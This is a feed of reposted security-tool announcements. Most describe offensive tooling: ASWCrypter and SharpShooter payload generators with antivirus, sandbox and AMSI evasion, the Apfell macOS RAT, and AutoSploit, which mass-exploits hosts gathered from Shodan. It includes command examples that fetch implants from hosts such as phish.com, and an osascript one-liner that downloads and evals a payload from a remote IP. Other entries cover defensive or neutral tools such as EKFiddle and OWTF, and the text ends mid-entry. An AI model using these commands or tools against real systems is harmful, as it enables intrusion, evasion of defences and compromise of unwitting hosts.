ASWCrypter – An Bash&Python Script For Generating Payloads that Bypasses All Antivirus

An Bash&Python Script For Generating Payloads that Bypasses All Antivirus so far [FUD].PLEASE DON’T UPLOAD BACKDOOT TO WWW.VIRUSTOTAL.COM ImportantThis Version Just for test , In future I will update ASWCrypter to generate a payloads for linux ,Mac and Windows . ;)Legal Disclamer:The author does not hold any responsibility for the bad use of this tool, remember this is only for educational purpose.Requirements1- Metasploit Framework 2- PythonGetting Startedgit clone https://github.com/AbedAlqaderSwedan1/ASWCrypter.gitcd ASWCrypterchmod +x setup.sh or chmod 777 setup.shScreenshotDownload ASWCrypter

Link: http://feedproxy.google.com/~r/PentestTools/~3/LBt2kOgRz1c/aswcrypter-bash-script-for-generating.html

SharpShooter – Payload Generation Framework

SharpShooter is a payload creation framework for the retrieval and execution of arbitrary CSharp source code. SharpShooter is capable of creating payloads in a variety of formats, including HTA, JS, VBS and WSF. It leverages James Forshaw’s DotNetToJavaScript tool to invoke methods from the SharpShooter DotNet serialised object. Payloads can be retrieved using Web or DNS delivery or both; SharpShooter is compatible with the MDSec ActiveBreach PowerDNS project. Alternatively, stageless payloads with embedded shellcode execution can also be generated for the same scripting formats.SharpShooter payloads are RC4 encrypted with a random key to provide some modest anti-virus evasion, and the project includes the capability to integrate sandbox detection and environment keying to assist in evading detection.SharpShooter includes a predefined CSharp template for executing shellcode with staged and stageless payloads, but any CSharp code can be compiled and invoked in memory using reflection, courtesy of CSharp’s CodeDom provider.Finally, SharpShooter provides the ability to bundle the payload inside an HTML file using the Demiguise HTML smuggling technique.SharpShooter targets v2, v3 and v4 of the .NET framework which will be found on most end-user Windows workstations.Version 1.0 of SharpShooter introduced several new concepts, including COM staging, execution of Squiblydoo and Squiblytwo, as well as XSL execution. To acomplish this new functionality, several new flags were added; –com, –awl and –awlurl.Further information can be found on the MDSec blog post.Usage – Command Line Mode:SharpShooter is highly configurable, supporting a number of different payload types, sandbox evasions, delivery methods and output types.Running SharpShooter with the –help argument will produce the following output:usage: SharpShooter.py [-h] [–stageless] [–dotnetver ] [–com <com>] [–awl <awl>] [–awlurl <awlurl>] [–payload <format>] [–sandbox <types>] [–amsi <amsi>] [–delivery <type>] [–rawscfile <path>] [–shellcode] [–scfile <path>] [–refs <refs>] [–namespace <ns>] [–entrypoint <ep>] [–web <web>] [–dns <dns>] [–output <output>] [–smuggle] [–template <tpl>]optional arguments: -h, –help show this help message and exit –stageless Create a stageless payload –dotnetver <ver> Target .NET Version: 2 or 4 –com <com> COM Staging Technique: outlook, shellbrowserwin, wmi, wscript, xslremote –awl <awl> Application Whitelist Bypass Technique: wmic, regsvr32 –awlurl <awlurl> URL to retrieve XSL/SCT payload –payload <format> Payload type: hta, js, jse, vba, vbe, vbs, wsf –sandbox <types> Anti-sandbox techniques: [1] Key to Domain (e.g. 1=CONTOSO) [2] Ensure Domain Joined [3] Check for Sandbox Artifacts [4] Check for Bad MACs [5] Check for Debugging –amsi <amsi> Use amsi bypass technique: amsienable –delivery <type> Delivery method: web, dns, both –rawscfile <path> Path to raw shellcode file for stageless payloads –shellcode Use built in shellcode execution –scfile <path> Path to shellcode file as CSharp byte array –refs <refs> References required to compile custom CSharp, e.g. mscorlib.dll,System.Windows.Forms.dll –namespace <ns> Namespace for custom CSharp, e.g. Foo.bar –entrypoint <ep> Method to execute, e.g. Main –web <web> URI for web delivery –dns <dns> Domain for DNS delivery –output <output> Name of output file (e.g. maldoc) –smuggle Smuggle file inside HTML –template <tpl> Name of template file (e.g. mcafee)Examples of some use cases are provided below:Stageless JavaScriptSharpShooter.py –stageless –dotnetver 4 –payload js –output foo –rawscfile ./raw.txt –sandbox 1=contoso,2,3Create a stageless JavaScript payload targeting version 4 of the .NET framework. This example will create a payload named foo.js in the output directory. The shellcode is read from the ./raw.txt file. The payload attempts to enforce some sandbox evasion by keying execution to the CONTOSO domain, and checking for known sandbox/VM artifacts.Stageless HTASharpShooter.py –stageless –dotnetver 2 –payload hta –output foo –rawscfile ./raw.txt –sandbox 4 –smuggle –template mcafeeCreate a stageless HTA payload targeting version 2/3 of the .NET framework. This example will create a payload named foo.hta in the output directory. The shellcode is read from the ./raw.txt file. The payload attempts to enforce some sandbox evasion by checking for known virtual MAC addresses. A HTML smuggling payload will also be generated named foo.html in the output directory. This payload will use the example McAfee virus scan template.Staged VBSSharpShooter.py –payload vbs –delivery both –output foo –web http://www.foo.bar/shellcode.payload –dns bar.foo –shellcode –scfile ./csharpsc.txt –sandbox 1=contoso –smuggle –template mcafee –dotnetver 4This example creates a staged VBS payload that performs both Web and DNS delivery. The payload will attempt to retrieve a GZipped CSharp file that executes the shellcode supplied as a CSharp byte array in the csharpsc.txt file. The CSharp file used is the built-in SharpShooter shellcode execution template. The payload is created in the output directory named foo.payload and should be hosted on http://www.foo.bar/shellcode.payload. The same file should also be hosted on the bar.foo domain using PowerDNS to serve it. The VBS file will attempt to key execution to the CONTOSO domain and will be embedded in a HTML file using the HTML smuggling technique with the McAfee virus scanned template. The resultant payload is stored in the output directory named foo.html.Custom CSharp inside VBSSharpShooter.py –dotnetver 2 –payload js –sandbox 2,3,4,5 –delivery web –refs mscorlib.dll,System.Windows.Forms.dll –namespace MDSec.SharpShooter –entrypoint Main –web http://www.phish.com/implant.payload –output malicious –smuggle –template mcafeeThis example demonstrates how to create a staged JS payload that performs web delivery, retrieving a payload from http://www.phish.com/implant.payload. The generated payload will attempt sandbox evasion, and attempt to compile the retrieved payload which requires mscorlib.dll and System.Windows.Forms.dll as DLL references. The Main method in the MDSec.SharpShooter namespace will be executed on successful compilation.Creation of a Squiblytwo VBSSharpShooter.py –stageless –dotnetver 2 –payload vbs –output foo –rawscfile ./x86payload.bin –smuggle –template mcafee –com outlook –awlurl http://192.168.2.8:8080/foo.xslThis example creates a VBS smuggled COM stager that uses the Outlook.CreateObject() COM method as a primitive to execute wmic.exe to execute a hosted stylesheet. The –awl parameter is not used by defaults to wmic.Creation of a XSL HTASharpShooter.py –stageless –dotnetver 2 –payload hta –output foo –rawscfile ./x86payload.bin –smuggle –template mcafee –com xslremote –awlurl http://192.168.2.8:8080/foo.xslThis example creates a HTA smuggled file that uses the the XMLDOM COM interface to retrieve and execute a hosted stylesheet.Author and CreditsAuthor: Dominic Chell, MDSec ActiveBreach @domchell and @mdseclabsCredits:@tiraniddo: James Forshaw for [email protected]: for [email protected]: Rich Warren for [email protected] and @ChrisTruncer: Brandon Arvanaghi and Chris Truncer for [email protected]: Documentation for Squiblydoo and Squiblytwo techniquesDownload SharpShooter

Link: http://feedproxy.google.com/~r/PentestTools/~3/KJriJP1hJA4/sharpshooter-payload-generation.html

Mallet – A Framework For Creating Proxies

Mallet is a tool for creating proxies for arbitrary protocols, along similar lines to the familiar intercepting web proxies, just more generic.It is built upon the Netty framework, and relies heavily on the Netty pipeline concept, which allows the graphical assembly of graphs of handlers. In the Netty world, handler instances provide frame delimitation (i.e. where does a message start and end), protocol decoding and encoding (converting a stream of bytes into Java objects, and back again, or converting a stream of bytes into a different stream of bytes – think compression and decompression), and higher level logic (actually doing something with those objects).By following the careful separation of Codecs from Handlers that actually manipulate the messages, Mallet can benefit from the large library of existing Codecs, and avoid reimplementation of many protocols. The final piece of the puzzle is provided by a Handler that copies messages received on one pipeline to another pipeline, proxying those messages on to their final destination.Of course, while the messages are within Mallet, they can easily be tampered with, either with custom Handlers written in Java or a JSR-223 compliant scripting language, or manually, using one of the provided editors.You can get an idea of the available codecs by looking at the Netty source at GitHub, under the codec* directories.Building MalletMallet makes use of Maven, so compiling the code is a matter ofmvn packageTo run it:cd target/java -jar mallet-1.0-SNAPSHOT-spring-boot.jarThere are a few sample graphs provided in the examples/ directory. The JSON graphs expect a JSON client to connect to Mallet on localhost:9998/tcp, with the real server at localhost:9999/tcp. Only the last JSON graph (json5.mxe) makes any assumptions about the structure of the JSON messages being passed, so they should be applicable to any app that sends JSON messages.The demo.mxe shows a complex graph, with two pipelines, both TCP and UDP. The TCP pipeline is built to support HTTP and HTTPS on ports 80 and 443 respectively, as well as WebSockets, while relaying any other traffic directly to its destination. The UDP pipeline is built to process DNS requests on localhost:1053/udp, replace queries for google.com with queries for www.sensepost.com, and forward the requests on to Google DNS servers.Download Mallet

Link: http://feedproxy.google.com/~r/PentestTools/~3/uEIqUbaTQy4/mallet-framework-for-creating-proxies.html

EKFiddle – A Framework Based On The Fiddler Web Debugger To Study Exploit Kits, Malvertising And Malicious Traffic In General

A framework based on the Fiddler web debugger to study Exploit Kits, malvertising and malicious traffic in general.InstallationDownload and install the latest version of Fiddlerhttps://www.telerik.com/fiddlerSpecial instructions for Linux and Mac here:https://www.telerik.com/blogs/fiddler-for-linux-beta-is-herehttps://www.telerik.com/blogs/introducing-fiddler-for-os-x-beta-1Enable C# scripting (Windows only)Launch Fiddler, and go to Tools -> OptionsIn the Scripting tab, change the default (JScript.NET) to C#.Change default text editor (optional)In the same Tools -> Options menu, click on the Tools tab.Windows: notepad.exe or notepad++.exeLinux: geditMac: /Applications/TextEdit.app or /Applications/TextWrangler.appClose FiddlerDownload or clone CustomRules.cs into the appropriate folder based on your operating system:Windows (7/10) C:\Users\[username]\Documents\Fiddler2\Scripts\ Ubuntu /home/[username]/Fiddler2/Scripts/ Mac /Users/[username]/Fiddler2/Scripts/ Finish up the installationStart Fiddler to complete the installation of EKFiddle. That’s it, you’re all set!FeaturesToolbar buttonsThe added toolbar buttons give you quick shortcuts to some of the main features:QuickSaveDumps current web sessions into a SAZ named (QuickSave-“MM-dd-yyyy-HH-mm-ss".saz) to EKFiddle\Captures.UI modeToggle between the default column view or extra columns with additional information (includes time stamp, server IP and type, method, etc.).VPNVPN GUI directly built into Fiddler. It uses the OpenVPN client on Windows and Linux with ovpn files (sigining up with commercial VPN provider may be required). It will open up a new terminal/xterm whenever it connects to a new server via the selected .ovpn config file, killing the previous to ensure only one TAP adapter is used at any given time.WindowsDownload and install OpenVPN in default directoryPlace your .ovpn files inside OpenVPN’s config folder.Linux (tested on Ubuntu 16.04)sudo apt-get install openvpnPlace your .ovpn files in /etc/openvpn.ProxyAllows you to connect to an upstream proxy (HTTP/s or SOCKS).Import SAZ/PCAPA shortcut to load SAZ (Fiddler’s native format) or PCAP (i.e. from Wireshark) captures.View/Edit RegexesView and create your custom regular expressions. Note: a master list is provided with auto-updates via GitHub. Additionally the custom list lets you create your own rules.Run RegexesRun the master and custom regular expressions against current web sessions.Clear MarkingsClear any comment and colour highlighting in the currently loaded sessions.ContextAction menuThe ContextAction menu (accessed by right-clicking on any session(s) allows you to perform additional commands on selected sections. This can be very helpful to do quick lookups, compute hashes or extract IOCs.Hostname or IP address (Google Search, RiskIQ, URLQuery, RiskIQ)Query the hostname for the currently selected session.URIBuild RegexCreate a regular expression from the currently selected URI. This action opens up a regex website and the URI is already in the clipboard, ready to be pasted into the query field.Open in… Internet Explorer, Chrome, Firefox, EdgeThis opens up the URI with the browser you selected.Response BodyRemove encodingDecodes the currently selected sessions (from their basic encoding).Build RegexCreate a regular expression from the currently selected session’s source code. This action opens up a regex website and the URI is already in the clipboard, ready to be pasted into the query field.Calculate MD5/SHA256 hashGet the current session’s body and computes its hash.Hybrid Analysis / VirusTotal lookupChecks the current session’s body for hash, then look up that hash.Extract to DiskDownloads the currently selection session(s)’s body to disk, into the ‘Artifacts’ folder.Extract IOCsCopies into memory basic information from selected sessions so that they can be shared as IOCs.Connect-the-dotsAllows you to identify the sequence of events between sessions. Right-clik on the session you are interested in retracing your steps to and simply ‘connect the dots’. It will label the sequence of events from 01, to n within the comments column. You can reorder that column to have a condensed view of the sequence.CrawlerLoad a list of URLs from a text file and let the browser automically visit them. Tools -> Crawler (experimental) -> Start crawler May require some tweaks in your browser’s settings, in particular with regards to crash recovery IE: not needed Firefox: about:config, set -1 value for toolkit.startup.max_resumed_crashes Chrome: not needed Edge: fix already includedUninstalling EKFiddleDelete CustomRules.csDownload EKFiddle

Link: http://feedproxy.google.com/~r/PentestTools/~3/OrfyeIMprN4/ekfiddle-framework-based-on-fiddler-web.html

RouterSploit v3.3.0 – Exploitation Framework For Embedded Devices

The RouterSploit Framework is an open-source exploitation framework dedicated to embedded devices.It consists of various modules that aids penetration testing operations:exploits – modules that take advantage of identified vulnerabilitiescreds – modules designed to test credentials against network servicesscanners – modules that check if a target is vulnerable to any exploitpayloads – modules that are responsible for generating payloads for various architectures and injection pointsgeneric – modules that perform generic attacksInstallationRequirementsRequired:futurerequestsparamikopysnmppycryptoOptional:bluepy – bluetooth low energyInstallation on Kali Linuxapt-get install python3-pipgit clone https://www.github.com/threat9/routersploitcd routersploitpython3 -m pip install -r requirements.txtpython3 rsf.pyBluetooth Low Energy support:apt-get install libglib2.0-devpython3 -m pip install bluepypython3 rsf.pyInstallation on Ubuntu 18.04 & 17.10sudo add-apt-repository universesudo apt-get install git python3-pipgit clone https://www.github.com/threat9/routersploitcd routersploitpython3 -m pip install -r requirements.txtpython3 rsf.pyBluetooth Low Energy support:apt-get install libglib2.0-devpython3 -m pip install bluepypython3 rsf.pyInstallation on OSXgit clone https://www.github.com/threat9/routersploitcd routersploitsudo python3 -m pip install -r requirements.txtpython3 rsf.pyRunning on Dockergit clone https://www.github.com/threat9/routersploitcd routersploitdocker build -t routersploit .docker run -it –rm routersploitUpdateUpdate RouterSploit Framework often. The project is under heavy development and new modules are shipped almost every day.cd routersploitgit pullDownload Routersploit

Link: http://feedproxy.google.com/~r/PentestTools/~3/bGEb3P4Ibw4/routersploit-v330-exploitation.html

TIDoS Framework – The Offensive Web Application Penetration Testing Framework

TIDoS Framework is a comprehensive web-app audit framework. let’s keep this simpleHighlights :-The main highlights of this framework is:TIDoS Framework now boasts of a century+ of modules.A complete versatile framework to cover up everything from Reconnaissance to Vulnerability Analysis.Has 5 main phases, subdivided into 14 sub-phases consisting a total of 104 modules.Reconnaissance Phase has 48 modules of its own (including active and passive recon, information disclosure modules).Scanning & Enumeration Phase has got 15 modules (including port scans, WAF analysis, etc)Vulnerability Analysis Phase has 36 modules (including most common vulnerabilites in action).Exploits Castle has only 1 exploit. (purely developmental)And finally, Auxillaries have got 4 modules. under dev.All four phases each have a Auto-Awesome module which automates every module for you.You just need the domain, and leave everything is to this tool.TIDoS has full verbose out support, so you’ll know whats going on.Fully user friendly interaction environment. (no shits)Installation :Clone the repository locally and navigate there:git clone https://github.com/theinfecteddrake/tidos-framework.gitcd tidos-frameworkInstall the dependencies:chmod +x install./installThats it! Now you are good to go! Now lets run the tool:tidosGetting Started :-TIDoS is made to be comprehensive and versatile. It is a highly flexible framework where you just have to select and use modules.But before that, you need to set your own API KEYS for various OSINT purposes. To do so, open up API_KEYS.py under files/ directory and set your own keys and access tokens for SHODAN, CENSYS, FULL CONTACT, GOOGLE and WHATCMS. Public API KEYS and ACCESS TOKENS for SHODAN and WHATCMS have been provided with the TIDoS release itself. You can still add your own… no harm!Finally, as the framework opens up, enter the website name eg. http://www.example.com and let TIDoS lead you. Thats it! Its as easy as that.Recommended: Follow the order of the tool (Run in a schematic way). Reconnaissance ➣ Scanning & Enumeration ➣ Vulnerability Analysis To update this tool, use tidos_updater.py module under tools/ folder.Flawless Features :-TIDoS Framework presently supports the following: and is under active development Reconnaissance + OSINT Passive Reconnaissance: Nping Enumeration Via external APiWhoIS Lookup Domain info gatheringGeoIP Lookup Pinpoint physical locationDNS Configuration Lookup DNSDumpSubdomains Lookup Indexed onesReverse DNS Lookup Host InstancesReverse IP Lookup Hosts on same serverSubnets Enumeration Class BasedDomain IP History IP InstancesWeb Links Gatherer Indexed onesGoogle Search Manual searchGoogle Dorking (multiple modules) AutomatedEmail to Domain Resolver Email WhoIsWayback Machine Lookups Find BackupsBreached Email Check Pwned Email AccountsEnumeration via Google Groups Emails OnlyCheck Alias Availability Social NetworksFind PasteBin Posts Domain BasedLinkedIn Gathering Employees & CompanyGoogle Plus Gathering Domain ProfilesPublic Contact Info Scraping FULL CONTACTCensys Intel Gathering Domain BasedThreat Intelligence Gathering Bad IPsActive Reconnaissance Ping Enumeration AdvancedCMS Detection (185+ CMSs supported) IMPROVEDAdvanced Traceroute IMPROVEDrobots.txt and sitemap.xml CheckerGrab HTTP Headers Live CaptureFind HTTP Methods Allowed via OPTIONSDetect Server Type IMPROVEDExamine SSL Certificate AbsoluteApache Status Disclosure Checks File BasedWebDAV HTTP Enumeration PROFIND & SEARCHPHPInfo File Enumeration via BruteforceComments Scraper Regex BasedFind Shared DNS Hosts Name Server BasedAlternate Sites Discovery User-Agent BasedDiscover Interesting Files via Bruteforce Common Backdoor Locations shells, etc.Common Backup Locations .bak, .db, etc.Common Password Locations .pgp, .skr, etc.Common Proxy Path Configs. .pac, etc.Common Dot Files .htaccess, .apache, etcInformation Disclosure Credit Cards Disclosure If PlaintextEmail Harvester IMPROVEDFatal Errors Enumeration Includes Full Path DisclosureInternal IP Disclosure Signature BasedPhone Number Havester Signature BasedSocial Security Number Harvester US Ones Scanning & Enumeration Remote Server WAF Enumeration Generic 54 WAFsPort Scanning Ingenious Modules Simple Port Scanner via Socket ConnectionsTCP SYN Scan Highly reliableTCP Connect Scan Highly ReliableXMAS Flag Scan Reliable Only in LANsFin Flag Scan Reliable Only in LANsPort Service DetectorWeb Technology Enumeration AbsoluteOperating System Fingerprinting IMPROVEDBanner Grabbing of Services via Open PortsInteractive Scanning with NMap 16 preloaded modulesEnumeration Domain-Linked IPs Using CENSYS DatabaseWeb and Links CrawlersDepth 1 Indexed Uri CrawlerDepth 2 Single Page CrawlerDepth 3 Web Link Crawler Vulnerability Analysis Web-Bugs & Server Misconfigurations Insecure CORS AbsoluteSame-Site Scripting Sub-domain basedZone Transfer DNS Server basedClickjackingFrame-Busting ChecksX-FRAME-OPTIONS Header ChecksSecurity on CookiesHTTPOnly FlagSecure FlagCloudflare Misconfiguration CheckDNS Misconfiguration ChecksOnline Database Lookup For BreachesHTTP Strict Transport Security UsageHTTPS Enabled but no HSTSDomain Based Email SpoofingMissing SPF RecordsMissing DMARC RecordsHost Header InjectionPort Based Over HTTP 80X-Forwarded-For Header InjectionSecurity Headers Analysis Live CaptureCross-Site Tracing HTTP TRACE MethodSession Fixation via Cookie InjectionNetwork Security Misconfig.Checks for TELNET Enabled via Port 23Serious Web Vulnerabilities File InclusionsLocal File Inclusion (LFI) Param basedRemote File Inclusion (RFI) IMPROVED Parameter BasedPre-loaded Path BasedOS Command Injection Linux & Windows (RCE)Path Traversal (Sensitive Paths)Cross-Site Request Forgery AbsoluteSQL InjectionError Based InjectionCookie Value BasedReferer Value BasedUser-Agent Value BasedAuto-gathering IMPROVEDBlind Based Injection Crafted Payloads Cookie Value BasedReferer Value BasedUser-Agent Value BasedAuto-gathering IMPROVEDLDAP Injection Parameter BasedHTML Injection Parameter BasedBash Command Injection ShellShockXPATH Injection Parameter BasedCross-Site Scripting IMPROVED Cookie Value BasedReferer Value BasedUser-Agent Value BasedParameter Value Based ManualUnvalidated URL Forwards Open RedirectPHP Code Injection Windows + LinuxHTTP Response Splitting CRLF Injection User-Agent Value BasedParameter value Based ManualSub-domain Takeover 50+ Services Single Sub-domain ManualAll Subdomains AutomatedOther PlainText Protocol Default Credential Bruteforce FTP Protocol BruteforceSSH Protocol BruteforcePOP 2/3 Protocol BruteforceSQL Protocol BruteforceXMPP Protocol BruteforceSMTP Protocol BruteforceTELNET Protocol Bruteforce Auxillary Modules Hash Generator MD5, SHA1, SHA256, SHA512String & Payload Encoder 7 CategoriesForensic Image Analysis Metadata ExtractionWeb HoneyPot Probability ShodanLabs HoneyScore Exploitation purely developmental ShellShockOther Tools:net_info.py – Displays information about your network. Located under tools/.tidos_updater.py – Updates the framework to the latest release via signature matching. Located under `tools/’.TIDoS In Action:Version:v1.6 [latest release] [#stable]Upcoming:There are some bruteforce modules to be added:Some more of Enumeraton & Information Disclosure modules.Lots more of OSINT & Stuff (let that be a suspense).More of Auxillary Modules.Some Exploits are too being worked on.Known Bugs:This version of TIDoS is purely developmental and is presently stable. There are bugs in resolving the [99] Back at various end-points which results in blind fall-backs. Though I have added global exception handling, still, there maybe bugs out there. Also TIDoS needs to develop more on logging all info displayed on the screen (help needed).Disclaimer:TIDoS is provided as a offensive web application audit framework. It has built-in modules which can reveal potential misconfigurations and vulnerabilties in web applications which could possibly be exploited maliciously.THEREFORE, I AM NOT EXCLUSIVELY RESPONSIBLE FOR ANY MISUSE OF THIS TOOLKIT.Download TIDoS-Framework

Link: http://feedproxy.google.com/~r/PentestTools/~3/dCgUcSrbBrM/tidos-framework-offensive-web.html

Apfell – A macOS, Post-Exploit, Red Teaming Framework

A macOS, post-exploit, red teaming framework built with python3 and JavaScript. It’s designed to provide a collaborative and user friendly interface for operators, managers, and reporting throughout mac and linux based red teaming.DetailsCheck out thre blog post on the initial release of the framework and what the bare bones content can do.InstallationGet the code from this github:git clone https://github.com/its-a-feature/ApfellInstall and setup the requirements (Note: The Sanic webserver says it only works on Linux):# The setup.sh will install postgres and pip3 install the requirementscd Apfell && chmod +x setup.sh && sudo ./setup.sh && cd ..Configure the installation in app/__init__.py:# ——– CONFIGURE SETTINGS HERE ———–db_name = ‘apfell_db’db_user = ‘apfell_user’db_pass = ‘super_secret_apfell_user_password’server_ip = ‘127.0.0.1’ # this will be used by the browser to callback here, edit this!listen_port = ‘443’listen_ip = ‘0.0.0.0’ # IP to bind to for the server, 0.0.0.0 means all local IPv4 addressesssl_cert_path = ‘./app/ssl/apfell-cert.pem’ssl_key_path = ‘./app/ssl/apfell-ssl.key’use_ssl = TrueThere is currently an issue with Sanic and websockets 6/7 (tracked issue, but no pull request yet) You need to edit Sanic with a slight update (I’m going to make a pull request for Sanic so we don’t need to do this, but that’ll take a little while). In the meantime, do sudo find / -type f -name “app.py" to find the appropriate Sanic file to edit. In here, find the line that says protocol = request.transport._protocol and edit it to be:if hasattr(request.transport, ‘_app_protocol’) protocol = request.transport._app_protocolelse: protocol = request.transport._protocolUsageStart the server:python3 server.py [2018-07-16 14:39:14 -0700] [28381] [INFO] Goin’ Fast @ https://0.0.0.0:443By default, the server will bind to 0.0.0.0 on port 443. This is an alias meaning that it will be listening on all IPv4 addresses on the machine. You don’t actually browse to https://0.0.0.0:443 in your browser. Instead, you’ll browse to either https://localhost:443 if you’re on the same machine that’s running the server, or you can browse to any of the IPv4 addresses on the machine that’s running the server. You could also browse to the IP address you specified in server_ip = ‘192.168.0.119’ in the installation section.Browse to the server with any modern web browser Create a new user: Create a new payload:Use the attacks_api to host the new file (this will eventually get updated with a GUI): # assuming we created a payload in our local ‘/tmp’ directorycurl -X POST'{"port":8080, "directory":"/tmp"}’ https://192.168.0.119/api/v1.0/attacks/host_fileThis will start a python simple web server in the /tmp directory on port 8080.Pull down and execute payload in memory:osascript -l JavaScript -e "eval(ObjC.unwrap($.NSString.alloc.initWithDataEncoding($.NSData.dataWithContentsOfURL($.NSURL.URLWithString(‘HTTP://192.168.0.119:8080/apfell-jxa’)),$.NSUTF8StringEncoding)));" Interact with the new RAT: Download Apfell

Link: http://feedproxy.google.com/~r/PentestTools/~3/9wqU15O2-l4/apfell-macos-post-exploit-red-teaming.html

AutoSploit v2.2 – Automated Mass Exploiter

As the name might suggest AutoSploit attempts to automate the exploitation of remote hosts. Targets can be collected automatically through Shodan, Censys or Zoomeye. But options to add your custom targets and host lists have been included as well. The available Metasploit modules have been selected to facilitate Remote Code Execution and to attempt to gain Reverse TCP Shells and/or Meterpreter sessions. Workspace, local host and local port for MSF facilitated back connections are configured by filling out the dialog that comes up before the exploit component is startedOperational Security ConsiderationReceiving back connections on your local machine might not be the best idea from an OPSEC standpoint. Instead consider running this tool from a VPS that has all the dependencies required, available.The new version of AutoSploit has a feature that allows you to set a proxy before you connect and a custom user-agent.Helpful linksUsageInstallingDependenciesUser Manual Extensive usage breakdownScreenshotsReporting bugs/ideasDevelopment guidelinesShoutoutsDevelopmentDiscord serverREADME translationsInstallationInstalling AutoSploit is very simple, you can find the latest stable release here. You can also download the master branch as a zip or tarball or follow one of the below methods;Cloningsudo -s << EOFgit clone https://github.com/NullArray/Autosploit.gitcd AutoSploitchmod +x install.sh./install.shpython2 autosploit.pyEOFDockersudo -s << EOFgit clone https://github.com/NullArray/AutoSploit.gitcd AutoSploitchmod +x install.sh./installshcd AutoSploit/Dockerdocker network create -d bridge haknetdocker run --network haknet --name msfdb -e POSTGRES_PASSWORD=s3cr3t -d postgresdocker build -t autosploit .docker run -it --network haknet -p 80:80 -p 443:443 -p 4444:4444 autosploitEOFOn any Linux system the following should work;git clone https://github.com/NullArray/AutoSploitcd AutoSploitchmod +x install.sh./install.shIf you want to run AutoSploit on a macOS system, AutoSploit is compatible with macOS, however, you have to be inside a virtual environment for it to run successfully. To do this, do the following;sudo -s << '_EOF'pip2 install virtualenv --usergit clone https://github.com/NullArray/AutoSploit.gitvirtualenv <PATH-TO-YOUR-ENV>source <PATH-TO-YOUR-ENV>/bin/activatecd <PATH-TO-AUTOSPLOIT>pip2 install -r requirements.txtchmod +x install.sh./install.shpython autosploit.py_EOFMore information on running Docker can be found hereUsageStarting the program with python autosploit.py will open an AutoSploit terminal session. The options for which are as follows.1. Usage And Legal2. Gather Hosts3. Custom Hosts4. Add Single Host5. View Gathered Hosts6. Exploit Gathered Hosts99. QuitChoosing option 2 will prompt you for a platform specific search query. Enter IIS or Apache in example and choose a search engine. After doing so the collected hosts will be saved to be used in the Exploit component.As of version 2.0 AutoSploit can be started with a number of command line arguments/flags as well. Type python autosploit.py -h to display all the options available to you. I’ve posted the options below as well for reference.usage: python autosploit.py -[c|z|s|a] -[q] QUERY [-C] WORKSPACE LHOST LPORT [-e] [–whitewash] PATH [–ruby-exec] [–msf-path] PATH [-E] EXPLOIT-FILE-PATH [–rand-agent] [–proxy] PROTO://IP:PORT [-P] AGENToptional arguments: -h, –help show this help message and exitsearch engines: possible search engines to use -c, –censys use censys.io as the search engine to gather hosts -z, –zoomeye use zoomeye.org as the search engine to gather hosts -s, –shodan use shodan.io as the search engine to gather hosts -a, –all search all available search engines to gather hostsrequests: arguments to edit your requests –proxy PROTO://IP:PORT run behind a proxy while performing the searches –random-agent use a random HTTP User-Agent header -P USER-AGENT, –personal-agent USER-AGENT pass a personal User-Agent to use for HTTP requests -q QUERY, –query QUERY pass your search queryexploits: arguments to edit your exploits -E PATH, –exploit-file PATH provide a text file to convert into JSON and save for later use -C WORKSPACE LHOST LPORT, –config WORKSPACE LHOST LPORT set the configuration for MSF (IE -C default 127.0.0.1 8080) -e, –exploit start exploiting the already gathered hostsmisc arguments: arguments that don’t fit anywhere else –ruby-exec if you need to run the Ruby executable with MSF use this –msf-path MSF-PATH pass the path to your framework if it is not in your ENV PATH –whitelist PATH only exploit hosts listed in the whitelist fileIf you want to run AutoSploit on a macOS system, AutoSploit is compatible with macOS, however, you have to be inside a virtual environment for it to run successfully. To do this, do the following;sudo -s << ‘_EOF’ pip2 install virtualenv –usergit clone https://github.com/NullArray/AutoSploit.gitvirtualenv <PATH-TO-YOUR-ENV>source <PATH-TO-YOUR-ENV>/bin/activatecd <PATH-TO-AUTOSPLOIT>pip2 install -r requirements.txtchmod +x install.sh./install.shpython autosploit.py_EOFDependenciesNote: All dependencies should be installed using the above installation method, however, if you find they are not:AutoSploit depends on the following Python2.7 modules.requestspsutilShould you find you do not have these installed get them with pip like so.pip install requests psutilorpip install -r requirements.txtSince the program invokes functionality from the Metasploit Framework you need to have this installed also. Get it from Rapid7 by clicking here.Download AutoSploit v2.2

Link: http://feedproxy.google.com/~r/PentestTools/~3/ZT_17-GzAcc/autosploit-v22-automated-mass-exploiter.html

OWTF v2.4 – Offensive Web Testing Framework

OWASP OWTF is a project focused on penetration testing efficiency and alignment of security tests to security standards like the OWASP Testing Guide (v3 and v4), the OWASP Top 10, PTES and NIST so that pentesters will have more time toSee the big picture and think out of the boxMore efficiently find, verify and combine vulnerabilitiesHave time to investigate complex vulnerabilities like business logic/architectural flaws or virtual hosting sessionsPerform more tactical/targeted fuzzing on seemingly risky areasDemonstrate true impact despite the short timeframes we are typically given to test.The tool is highly configurable and anybody can trivially create simple plugins or add new tests in the configuration files without having any development experience.Note: This tool is however not a silverbullet and will only be as good as the person using it: Understanding and experience will be required to correctly interpret tool output and decide what to investigate further in order to demonstrate impact.RequirementsOWTF is developed on KaliLinux and macOS but it is made for Kali Linux (or other Debian derivatives)OWTF supports both Python2 and Python3.InstallationRecommended:Using a virtualenv is highly recommended!pip install git+https://github.com/owtf/owtf#egg=owtfor clone the repo andpython setup.py installIf you want to change the database password in the Docker Compose setup, edit the environment variables in the docker-compose.yml file. If you prefer to override the environment variables in a .env file, use the file name owtf.env so that Docker Compose knows to include it.To run OWTF on Windows or MacOS, OWTF uses Docker Compose. You need to have Docker Compose installed (check by docker-compose -v). After installing Docker Compose, simply run docker-compose up and open localhost:8009 for the OWTF web interface.Install on OSXDependencies: Install Homebrew (https://brew.sh/) and follow the steps given below:$ virtualenv $ source <venv name>/bin/activate $ brew install coreutils gnu-sed openssl # We need to install ‘cryptography’ first to avoid issues $ pip install cryptography –global-option=build_ext –global-option=”-L/usr/local/opt/openssl/lib" –global-option="-I/usr/local/opt/openssl/include" $ git clone <this repo> $ cd owtf $ python setup.py install # Run OWTF! $ owtf FeaturesResilience: If one tool crashes OWTF, will move on to the next tool/test, saving the partial output of the tool until it crashed.Flexible: Pause and resume your work.Tests Separation: OWTF separates its traffic to the target into mainly 3 types of plugins:Passive : No traffic goes to the targetSemi Passive : Normal traffic to targetActive: Direct vulnerability probingExtensive REST API.Has almost complete OWASP Testing Guide(v3, v4), Top 10, NIST, CWE coverage.Web interface: Easily manage large penetration engagements easily.Interactive report:Automated plugin rankings from the tool output, fully configurable by the user.Configurable risk rankingsIn-line notes editor for each 